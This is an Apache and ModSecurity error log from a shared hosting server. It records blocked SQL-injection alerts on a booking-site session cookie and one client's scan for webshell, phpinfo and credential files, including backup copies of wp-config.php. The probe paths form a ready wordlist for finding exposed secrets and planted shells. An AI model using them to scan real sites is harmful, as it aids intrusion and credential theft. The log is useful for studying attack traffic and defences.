[Mon May 11 22:42:24.562585 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 34.174.169.211:59106] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.pl
[Mon May 11 22:42:24.562723 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 34.174.169.211:59106] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.cgi
[Mon May 11 22:42:24.562770 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 34.174.169.211:59106] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.jsp
[Mon May 11 22:42:24.562878 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 34.174.169.211:59106] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.phtml
[Mon May 11 22:42:24.562917 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 34.174.169.211:59106] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.shtml
[Mon May 11 22:42:30.301087 2026] [security2:error] [pid 1605480:tid 1605526] [client 45.94.31.112:62210] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: f88121367b9e39fe6931e89860511a2f||1778533949||1778533589"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI_Nh2Cvzd_nyNfUm8EJwAAAQQ"]
[Mon May 11 22:42:30.301408 2026] [security2:error] [pid 1605480:tid 1605526] [client 45.94.31.112:62210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI_Nh2Cvzd_nyNfUm8EJwAAAQQ"]
[Mon May 11 22:42:31.062194 2026] [security2:error] [pid 1605480:tid 1605526] [client 45.94.31.112:62210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI_Nh2Cvzd_nyNfUm8EJwAAAQQ"]
[Mon May 11 22:42:32.776875 2026] [security2:error] [pid 1588898:tid 1588905] [client 43.153.12.58:34910] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.fr"] [uri "/"] [unique_id "agI_OKFW67LJTsgN3jQQ_gAAAAY"]
[Mon May 11 22:42:33.302465 2026] [security2:error] [pid 1605480:tid 1605526] [client 45.94.31.112:62210] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: f88121367b9e39fe6931e89860511a2f||1778533949||1778533589"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI_OR2Cvzd_nyNfUm8EKwAAAQQ"]
[Mon May 11 22:42:33.302734 2026] [security2:error] [pid 1605480:tid 1605526] [client 45.94.31.112:62210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI_OR2Cvzd_nyNfUm8EKwAAAQQ"]
[Mon May 11 22:42:33.941194 2026] [security2:error] [pid 1605480:tid 1605526] [client 45.94.31.112:62210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI_OR2Cvzd_nyNfUm8EKwAAAQQ"]
[Mon May 11 22:42:34.421421 2026] [security2:error] [pid 1590352:tid 1590398] [client 119.28.140.106:49612] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/"] [unique_id "agI_Oq1q0G_aXAqWauQAAgAAAIY"]
[Mon May 11 22:42:34.567397 2026] [security2:error] [pid 1605480:tid 1605526] [client 45.94.31.112:62210] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: f88121367b9e39fe6931e89860511a2f||1778533949||1778533589"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/users/"] [unique_id "agI_Oh2Cvzd_nyNfUm8ELwAAAQQ"]
[Mon May 11 22:42:34.567602 2026] [security2:error] [pid 1605480:tid 1605526] [client 45.94.31.112:62210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/users/"] [unique_id "agI_Oh2Cvzd_nyNfUm8ELwAAAQQ"]
[Mon May 11 22:42:34.946982 2026] [security2:error] [pid 1605480:tid 1605526] [client 45.94.31.112:62210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI_Oh2Cvzd_nyNfUm8ELwAAAQQ"]
[Mon May 11 22:42:43.311642 2026] [ssl:error] [pid 1606352:tid 1606423] (EAI 2)Name or service not known: [client 78.24.220.190:55988] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:42:43.311918 2026] [ssl:error] [pid 1606352:tid 1606423] AH01941: stapling_renew_response: responder error
[Mon May 11 22:42:43.915329 2026] [security2:error] [pid 1534836:tid 1534884] [client 114.119.134.48:56739] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: b601f257d147bb4cd621d2cf88d571ce||1778533962||1778533602"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/mon-compte/"] [unique_id "agI_Q9eaRXe5lR8y0ZO6wgAAAU0"], referer: https://rentparadise.fr/mobilhome/mon-compte/
[Mon May 11 22:42:43.932261 2026] [security2:error] [pid 1534836:tid 1534884] [client 114.119.134.48:56739] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/mon-compte/"] [unique_id "agI_Q9eaRXe5lR8y0ZO6wgAAAU0"], referer: https://rentparadise.fr/mobilhome/mon-compte/
[Mon May 11 22:42:44.096764 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/moon.php
[Mon May 11 22:42:44.200643 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/a1.php
[Mon May 11 22:42:44.296565 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/ahax.php
[Mon May 11 22:42:44.414442 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/lite.php
[Mon May 11 22:42:44.459229 2026] [security2:error] [pid 1588898:tid 1588904] [client 45.94.31.112:57626] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: f88121367b9e39fe6931e89860511a2f||1778533949||1778533589"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agI_RKFW67LJTsgN3jQREQAAAAU"]
[Mon May 11 22:42:44.459651 2026] [security2:error] [pid 1588898:tid 1588904] [client 45.94.31.112:57626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agI_RKFW67LJTsgN3jQREQAAAAU"]
[Mon May 11 22:42:44.510899 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/k.php
[Mon May 11 22:42:44.607020 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/leaf.php
[Mon May 11 22:42:44.723746 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/wp-conflg.php
[Mon May 11 22:42:44.831619 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/wp_filemanager.php
[Mon May 11 22:42:44.854849 2026] [security2:error] [pid 1534836:tid 1534884] [client 114.119.134.48:56739] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI_Q9eaRXe5lR8y0ZO6wgAAAU0"], referer: https://rentparadise.fr/mobilhome/mon-compte/
[Mon May 11 22:42:44.940665 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/pp.php
[Mon May 11 22:42:45.043880 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/index26.php
[Mon May 11 22:42:45.140142 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/12.php
[Mon May 11 22:42:45.236846 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/Marvins.php
[Mon May 11 22:42:45.244255 2026] [security2:error] [pid 1588898:tid 1588904] [client 45.94.31.112:57626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI_RKFW67LJTsgN3jQREQAAAAU"]
[Mon May 11 22:42:45.333295 2026] [security2:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/wp-config.php.backup"] [unique_id "agI_RR2Cvzd_nyNfUm8ESgAAAQ4"]
[Mon May 11 22:42:45.333493 2026] [security2:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/wp-config.php.backup"] [unique_id "agI_RR2Cvzd_nyNfUm8ESgAAAQ4"]
[Mon May 11 22:42:45.333876 2026] [security2:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/wp-config.php.backup"] [unique_id "agI_RR2Cvzd_nyNfUm8ESgAAAQ4"]
[Mon May 11 22:42:45.431385 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/aa.php
[Mon May 11 22:42:45.777909 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/abcd.php
[Mon May 11 22:42:45.877346 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/a2.php
[Mon May 11 22:42:45.972876 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/wp-gr.php
[Mon May 11 22:42:46.069120 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/xynz1.php
[Mon May 11 22:42:46.246022 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/uqcxit7i.php
[Mon May 11 22:42:46.341757 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/display_info.php
[Mon May 11 22:42:46.437532 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/wp-config-disabled.php
[Mon May 11 22:42:47.108622 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/test_info.php
[Mon May 11 22:42:47.274829 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/spip.php
[Mon May 11 22:42:47.374637 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/wp-index.php
[Mon May 11 22:42:47.496619 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/php-nginx.php
[Mon May 11 22:42:47.601233 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/wp-config.test.php
[Mon May 11 22:42:47.698690 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/op.php
[Mon May 11 22:42:48.228734 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/mandrill.php
[Mon May 11 22:42:48.376595 2026] [security2:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/backup.wp-config.php"] [unique_id "agI_SB2Cvzd_nyNfUm8EXQAAAQ4"]
[Mon May 11 22:42:48.376750 2026] [security2:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/backup.wp-config.php"] [unique_id "agI_SB2Cvzd_nyNfUm8EXQAAAQ4"]
[Mon May 11 22:42:48.376987 2026] [security2:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/backup.wp-config.php"] [unique_id "agI_SB2Cvzd_nyNfUm8EXQAAAQ4"]
[Mon May 11 22:42:48.434251 2026] [security2:error] [pid 1588898:tid 1588912] [client 45.94.31.112:65465] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: f88121367b9e39fe6931e89860511a2f||1778533949||1778533589"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/xmlrpc.php"] [unique_id "agI_SKFW67LJTsgN3jQREgAAAA0"]
[Mon May 11 22:42:48.434453 2026] [security2:error] [pid 1588898:tid 1588912] [client 45.94.31.112:65465] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/xmlrpc.php"] [unique_id "agI_SKFW67LJTsgN3jQREgAAAA0"]
[Mon May 11 22:42:48.676613 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/20.php
[Mon May 11 22:42:48.779677 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/upload_file.php
[Mon May 11 22:42:48.877927 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/aws.settings.php
[Mon May 11 22:42:49.052533 2026] [security2:error] [pid 1588898:tid 1588912] [client 45.94.31.112:65465] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI_SKFW67LJTsgN3jQREgAAAA0"]
[Mon May 11 22:42:49.569908 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/payout.php
[Mon May 11 22:42:49.667746 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/pqr.php
[Mon May 11 22:42:49.764026 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/phpinfo.php
[Mon May 11 22:42:49.859454 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/tmp.php
[Mon May 11 22:42:49.965566 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/456.php
[Mon May 11 22:42:50.439170 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/new2.php
[Mon May 11 22:42:50.536488 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/server.php
[Mon May 11 22:42:50.636813 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/extension-info.php
[Mon May 11 22:42:51.002265 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/conn_test.php
[Mon May 11 22:42:51.496597 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/information.php
[Mon May 11 22:42:51.595115 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/credentials.php
[Mon May 11 22:42:51.704995 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/phphph.php
[Mon May 11 22:42:51.805101 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/test-cgi.php
[Mon May 11 22:42:51.909079 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/twin.php
[Mon May 11 22:42:52.004928 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/pi.php7
[Mon May 11 22:42:52.329375 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/display_phpinfo.php
[Mon May 11 22:42:52.425639 2026] [:error] [pid 1605480:tid 1605536] [client 20.220.233.65:12717] File does not exist: /home/nearoofr/public_html/webserver-info.php
